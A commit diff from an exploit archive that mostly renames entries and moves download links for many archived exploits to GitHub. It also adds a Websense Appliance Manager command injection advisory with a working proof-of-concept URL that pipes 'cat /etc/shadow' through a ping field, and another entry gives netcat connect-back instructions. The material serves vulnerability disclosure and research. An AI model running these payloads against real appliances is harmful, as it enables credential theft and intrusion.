DB: 2015-03-19

2 new exploits
2015-03-19 09:39:10 +00:00 · 2015-03-19 09:39:10 +00:00 · 5924dde297
commit 5924dde297
parent 2c86657105
1164 changed files with 1499 additions and 1313 deletions
--- a/files.csv
+++ b/files.csv
@ -4481,7 +4481,7 @@ id,file,description,date,author,platform,type,port
 4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0
 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0
 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0
-4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
+4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0
 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0
 4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload Vulnerability",2008-01-06,Houssamix,php,webapps,0
@ -5255,7 +5255,7 @@ id,file,description,date,author,platform,type,port
 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
-5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
+5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@ -32839,6 +32839,8 @@ id,file,description,date,author,platform,type,port
 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
-36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
+36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0
 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25
+36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000
+36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447
--- a/platforms/android/local/9477.txt
+++ b/platforms/android/local/9477.txt
@ -1,6 +1,6 @@
 Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.

 orig: http://zenthought.org/content/file/android-root-2009-08-16-source
-back: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz

 # milw0rm.com [2009-08-18]
--- a/platforms/asp/remote/15213.pl
+++ b/platforms/asp/remote/15213.pl
@ -10,7 +10,7 @@
 #  Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. 
 #  A similar exploitation vector was also added lately in Padbuster v0.3: 
 #  http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
-#  http://www.exploit-db.com/sploits/padBuster.pl
+#  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
 #
 #
 #  Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
--- a/platforms/beos/local/19840.txt
+++ b/platforms/beos/local/19840.txt
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1098/info

 A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. 

-http://www.exploit-db.com/sploits/19840.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19840.tgz
--- a/platforms/bsd/local/19411.txt
+++ b/platforms/bsd/local/19411.txt
@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags
 Hacker mounts modified device as /usr.
 Hacker installs backdoored /usr/bin/login. 

-http://www.exploit-db.com/sploits/19411.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19411.tgz
--- a/platforms/bsd/local/23655.txt
+++ b/platforms/bsd/local/23655.txt
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9586/info

 A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process.

-http://www.exploit-db.com/sploits/23655.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23655.tar.gz
--- a/platforms/bsd/remote/19520.txt
+++ b/platforms/bsd/remote/19520.txt
@ -49,5 +49,5 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  amd64
 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

-Exploit-DB mirror: http://www.exploit-db.com/sploits/19520.zip
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip

--- a/platforms/freebsd/local/12090.txt
+++ b/platforms/freebsd/local/12090.txt
@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
 improper handling of environment variables.

 Download:
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0404.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf
--- a/platforms/freebsd/local/12091.txt
+++ b/platforms/freebsd/local/12091.txt
@ -14,4 +14,4 @@ Vulnerability Description:
 Some files that allow to obtain usernames and other internal information can be read by any user inside
 the CLI.

-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0403.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf
--- a/platforms/freebsd/remote/17462.txt
+++ b/platforms/freebsd/remote/17462.txt
@ -196,7 +196,7 @@ Kingcope
 A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.

 the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
-Mirror: http://www.exploit-db.com/sploits/ssh_0day.tar.gz
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz

 run like ./ssh -1 -z <yourip> <target>
 setup a netcat, port 443 on yourip first
--- a/platforms/freebsd/remote/18181.txt
+++ b/platforms/freebsd/remote/18181.txt
@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
 /Signed "the awesome" Kingcope

 Code:
-http://www.exploit-db.com/sploits/7350roaringbeastv3.tar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar

--- a/platforms/freebsd/remote/20593.txt
+++ b/platforms/freebsd/remote/20593.txt
@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be

 Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. 

-http://www.exploit-db.com/sploits/20593.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20593.tgz
--- a/platforms/freebsd/webapps/12658.txt
+++ b/platforms/freebsd/webapps/12658.txt
@ -15,4 +15,4 @@ improper profile check.
 ===========
 Download:
 ===========
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
--- a/platforms/hardware/dos/11043.txt
+++ b/platforms/hardware/dos/11043.txt
@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com
 ===============
 Download
 ===============
-http://www.exploit-db.com/sploits/Sony_Ericsson.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar
--- a/platforms/hardware/dos/12093.txt
+++ b/platforms/hardware/dos/12093.txt
@ -15,4 +15,4 @@ Users inside the CLI can run some kind of
 of an insecure ulimit value.

 Download:
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0401.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf
--- a/platforms/hardware/dos/13823.txt
+++ b/platforms/hardware/dos/13823.txt
@ -1,3 +1,3 @@
 I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls  which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. 

-http://www.exploit-db.com/sploits/savysoda_poc.xls
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls
--- a/platforms/hardware/dos/13824.txt
+++ b/platforms/hardware/dos/13824.txt
@ -1,3 +1,3 @@
 I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls  which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. 

-http://www.exploit-db.com/sploits/office2_poc.xls
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls
--- a/platforms/hardware/dos/13825.txt
+++ b/platforms/hardware/dos/13825.txt
@ -1,3 +1,3 @@
 I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls  which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. 

-http://www.exploit-db.com/sploits/goodreader_poc.xls
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls
--- a/platforms/hardware/dos/18751.txt
+++ b/platforms/hardware/dos/18751.txt
@ -130,7 +130,7 @@ other bugs and understanding them :)


 http://aluigi.org/poc/samsux_1.zip
-http://www.exploit-db.com/sploits/18751.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18751.zip


 #######################################################################
--- a/platforms/hardware/dos/20821.txt
+++ b/platforms/hardware/dos/20821.txt
@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to

 This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. 

-http://www.exploit-db.com/sploits/20821.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20821.tgz
--- a/platforms/hardware/dos/20824.txt
+++ b/platforms/hardware/dos/20824.txt
@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate

 This problem makes it possible for a remote user to deny service to legitimate users of the switch.

-http://www.exploit-db.com/sploits/20824.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20824.tgz
--- a/platforms/hardware/dos/21092.txt
+++ b/platforms/hardware/dos/21092.txt
@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw

 This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. 

-http://www.exploit-db.com/sploits/21092.mrc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21092.mrc
--- a/platforms/hardware/dos/22596.txt
+++ b/platforms/hardware/dos/22596.txt
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7575/info

 It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. 

-http://www.exploit-db.com/sploits/22596.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22596.zip
--- a/platforms/hardware/dos/22978.txt
+++ b/platforms/hardware/dos/22978.txt
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8323/info

 It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory.

-http://www.exploit-db.com/sploits/22978.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22978.tgz
--- a/platforms/hardware/dos/23876.txt
+++ b/platforms/hardware/dos/23876.txt
@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera

 Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process.

-http://www.exploit-db.com/sploits/23876.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23876.zip
--- a/platforms/hardware/dos/23900.txt
+++ b/platforms/hardware/dos/23900.txt
@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib

 All versions of cdp are assumed to be vulnerable to this issue. 

-http://www.exploit-db.com/sploits/23900.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23900.tgz
--- a/platforms/hardware/dos/28228.txt
+++ b/platforms/hardware/dos/28228.txt
@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash

 The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed.

-http://www.exploit-db.com/sploits/28228.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28228.zip
--- a/platforms/hardware/dos/8013.txt
+++ b/platforms/hardware/dos/8013.txt
@ -27,7 +27,7 @@ POC/EXPLOIT
 you can open this url with the browser or send mms with this image.

 http://es.geocities.com/jplopezy/nokiacrash.jpg
-alt: http://www.exploit-db.com/sploits/2009-nokiacrash.jpg
+alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg

 ------------------------------------------------------
 Juan Pablo Lopez Yacubian
--- a/platforms/hardware/local/21001.txt
+++ b/platforms/hardware/local/21001.txt
@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia
  
 Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

-http://www.exploit-db.com/sploits/21001.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21001.tar.gz
--- a/platforms/hardware/remote/12298.txt
+++ b/platforms/hardware/remote/12298.txt
@ -9,7 +9,7 @@
 #                    V100R001B121Telmex
 # Exploit Download Link:
 # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz
-# http://www.exploit-db.com/sploits/HG520_udpinfo.tar.gz
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz


 By sending a specially crafted UDP packet you can remotely obtain the
--- a/platforms/hardware/remote/18291.txt
+++ b/platforms/hardware/remote/18291.txt
@ -7,6 +7,6 @@
 # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
 # CVE : No CVE US-CERT VU#723755

-http://www.exploit-db.com/sploits/reaver-1.1.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz


--- a/platforms/hardware/remote/19538.txt
+++ b/platforms/hardware/remote/19538.txt
@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/695/info

 Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem.

-http://www.exploit-db.com/sploits/19538-1.tar.gz
-http://www.exploit-db.com/sploits/19538-2.tar.gz
-http://www.exploit-db.com/sploits/19538-3.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-1.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-2.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-3.tar.gz
--- a/platforms/hardware/remote/2034.txt
+++ b/platforms/hardware/remote/2034.txt
@ -1,5 +1,5 @@
 BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities

-http://www.exploit-db.com/sploits/07182006-btvoyager.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz

 # milw0rm.com [2006-07-18]
--- a/platforms/hardware/remote/22532.txt
+++ b/platforms/hardware/remote/22532.txt
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7423/info

 When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. 

-http://www.exploit-db.com/sploits/22532.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22532.tar.gz
--- a/platforms/hardware/remote/23212.txt
+++ b/platforms/hardware/remote/23212.txt
@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all

 Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. 

-http://www.exploit-db.com/sploits/23212.tar.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23212.tar.bz2
--- a/platforms/hardware/remote/28056.txt
+++ b/platforms/hardware/remote/28056.txt
@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term.
 The 50 megs Mikrotik package including the all research items can be downloaded here: 

 http://www.farlight.org/mikropackage.zip
-http://www.exploit-db.com/sploits/28056.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip
--- a/platforms/hardware/remote/31132.txt
+++ b/platforms/hardware/remote/31132.txt
@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o

 These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. 

-http://www.exploit-db.com/sploits/31132.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31132.zip
--- a/platforms/hardware/remote/33869.txt
+++ b/platforms/hardware/remote/33869.txt
@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl
 Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
 Software Versions: V100R001B120Telmex, V100R001B121Telmex 

-http://www.exploit-db.com/sploits/33869.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33869.tar.gz
--- a/platforms/hardware/remote/34465.txt
+++ b/platforms/hardware/remote/34465.txt
@ -1,4 +1,4 @@
 When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance.
 The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device.

-Advisory: http://www.exploit-db.com/sploits/34465.pdf
+Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34465.pdf
--- a/platforms/hardware/remote/8269.txt
+++ b/platforms/hardware/remote/8269.txt
@ -197,7 +197,7 @@ name="backdoor">

 Proof-of-concept brute force tool available at
 http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
-http://www.exploit-db.com/sploits/2009-Louhi_CMC-brute_090323.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip


 Other information:
--- a/platforms/hardware/shellcode/13294.txt
+++ b/platforms/hardware/shellcode/13294.txt
@ -1,6 +1,6 @@
 The pdf is located at:

-http://www.exploit-db.com/sploits/lynn-cisco.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf

 /str0ke

--- a/platforms/hardware/webapps/11101.txt
+++ b/platforms/hardware/webapps/11101.txt
@ -16,5 +16,5 @@ firmware versions have been confirmed to date:
 Detailed description available here:
 http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf

-POC code available here: http://www.exploit-db.com/sploits/hnap0wn.tar.gz
+POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz

--- a/platforms/hardware/webapps/12092.txt
+++ b/platforms/hardware/webapps/12092.txt
@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti
 logged-in user.

 Download:
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0402.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf
--- a/platforms/hardware/webapps/29959.txt
+++ b/platforms/hardware/webapps/29959.txt
@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
 Root-Node


-Exploit-DB mirror: http://www.exploit-db.com/sploits/29959.nse
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
--- a/platforms/hardware/webapps/34254.txt
+++ b/platforms/hardware/webapps/34254.txt
@ -9,7 +9,7 @@ http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
 # Tested on: TP-Link TL-WR740N v4

 Exploit:
-http://www.exploit-db.com/sploits/34254.7z
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34254.7z

 Vulnerability description:
 The domain name parameters of the "Parental Control" and "Access 
--- a/platforms/ios/local/14538.txt
+++ b/platforms/ios/local/14538.txt
@ -1,3 +1,3 @@
 The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS.  These pdf's are of interest in that they originate in userland and give root access to the devices.

-http://www.exploit-db.com/sploits/ios_pdf_exploit.7z
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z
--- a/platforms/ios/remote/28081.txt
+++ b/platforms/ios/remote/28081.txt
@ -54,7 +54,7 @@ into the JS code).

 The full exploit code is available here:
 http://packetstormsecurity.com/files/123088/
-http://www.exploit-db.com/sploits/28081.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28081.tgz

 +------------------------------------------------------------------------------+

--- a/platforms/java/remote/30502.txt
+++ b/platforms/java/remote/30502.txt
@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne

 An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. 

-http://www.exploit-db.com/sploits/30502.tti
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30502.tti
--- a/platforms/java/webapps/36423.txt
+++ b/platforms/java/webapps/36423.txt
@ -0,0 +1,38 @@
+Abstract
+
+
+A command injection vulnerability was found in Websense Appliance Manager that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
+
+Tested versions
+
+
+This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well.
+
+Fix
+
+
+Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location:
+http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions
+
+This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location:
+http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
+
+Introduction
+
+
+Websense Data Security Suite contains three modules - Data Security Gateway, Data Discover, and Data Endpoint - that can help manage the risk of losing your data to malicious users or accidental misuse.
+
+The Websense Appliance Manager GUI has a web-based 'command line utility' that provides the ability to execute various network debugging commands, which can be run on any module; Appliance Controller, Content Gateway, Web Security, Network Agent, Email Security Gateway. This command line utility is affected by command injection that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
+
+Details
+
+
+The CommandLineServlet Java Servlet is responsible for enforcing limitations on the type of network debugging commands users are allowed to run using the GUI. An attacker is able to bypass these limitations by breaking out of any network diagnostics command that requires a second parameter (in this example Destination). This allows the attacker to inject arbitrary system commands. For example, the pipe character (|) is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to execute any available system command (such as adduser or nc to start a reverse shell). The output is returned to the user, the commands are executed with elevated privileges (root).
+
+With a little help of social engineering (like sending a link via email/chat), an attacker may trick authenticated users to execute arbitrary commands on behalf of the attacker. A more effective attack would be to abuse other Websense vulnerabilities like Cross-Site Scripting.
+
+The following proof of concept will return the contents of /etc/shadow on affected appliances:
+
+https://host:9447/appmng/servlet/CommandLineServlet?type=exec&uuid=asdfasdf&module=na1&command=ping&Destination=127.0.0.1'|cat%20/etc/shadow'
+
+Other attack scenarios are also possible, like creating a backdoor account on the appliance.
--- a/platforms/lin_amd64/local/35472.txt
+++ b/platforms/lin_amd64/local/35472.txt
@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value
 +------------------+

 The proof of concept exploit code is available here:
-http://www.exploit-db.com/sploits/35472.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35472.tgz
 http://packetstormsecurity.com/files/129398

 +------------------------------------------------------------------------------+
--- a/platforms/lin_x86-64/local/36310.txt
+++ b/platforms/lin_x86-64/local/36310.txt
@ -2,7 +2,7 @@ Sources:
 http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
 https://code.google.com/p/google-security-research/issues/detail?id=283

-Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz
+Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36310.tar.gz

 This is a proof-of-concept exploit that is able to gain kernel
 privileges on machines that are susceptible to the DRAM "rowhammer"
--- a/platforms/lin_x86-64/local/36311.txt
+++ b/platforms/lin_x86-64/local/36311.txt
@ -2,7 +2,7 @@ Sources:
 http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
 https://code.google.com/p/google-security-research/issues/detail?id=284

-Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz
+Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36311.tar.gz


 This is a proof-of-concept exploit that is able to escape from Native
--- a/platforms/lin_x86/remote/20032.txt
+++ b/platforms/lin_x86/remote/20032.txt
@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi
  
 It should be noted that the SITE INDEX command is affected as well. 

-http://www.exploit-db.com/sploits/20032.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz
--- a/platforms/lin_x86/shellcode/13366.txt
+++ b/platforms/lin_x86/shellcode/13366.txt
@ -1,5 +1,5 @@
 # linux/x86 xor-encoded Connect Back Shellcode 371 bytes

-http://www.exploit-db.com/sploits/black-RXenc-con-back.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz

 # milw0rm.com [2006-04-18]
--- a/platforms/linux/dos/10203.txt
+++ b/platforms/linux/dos/10203.txt
@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
 NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. 


-Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2
--- a/platforms/linux/dos/10206.txt
+++ b/platforms/linux/dos/10206.txt
